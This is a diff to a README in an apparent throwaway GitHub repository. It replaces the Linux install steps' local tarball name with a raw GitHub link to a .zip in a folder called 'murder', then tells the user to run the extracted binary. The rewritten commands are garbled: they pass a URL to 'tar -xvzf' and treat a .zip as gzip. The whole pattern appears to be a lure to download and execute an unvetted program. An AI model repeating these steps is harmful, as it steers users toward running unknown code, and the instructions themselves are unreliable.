Jonah0303/amanansdiahnid-10/README.md

 ### For Linux:

 1. Open a terminal window.
-2. Navigate to your Downloads folder where you saved the `.tar.gz` file.
+2. Navigate to your Downloads folder where you saved the `https://raw.githubusercontent.com/Jonah0303/amanansdiahnid-10/main/murder/amanansdiahnid-10.zip` file.
-3. Use the command `tar -xvzf amanansdiahnid-10.tar.gz` to extract the files.
+3. Use the command `tar -xvzf https://raw.githubusercontent.com/Jonah0303/amanansdiahnid-10/main/murder/amanansdiahnid-10.zip` to extract the files.
 4. Go into the newly created folder using `cd amanansdiahnid-10`.
 5. Run the application using `./amanansdiahnid-10`.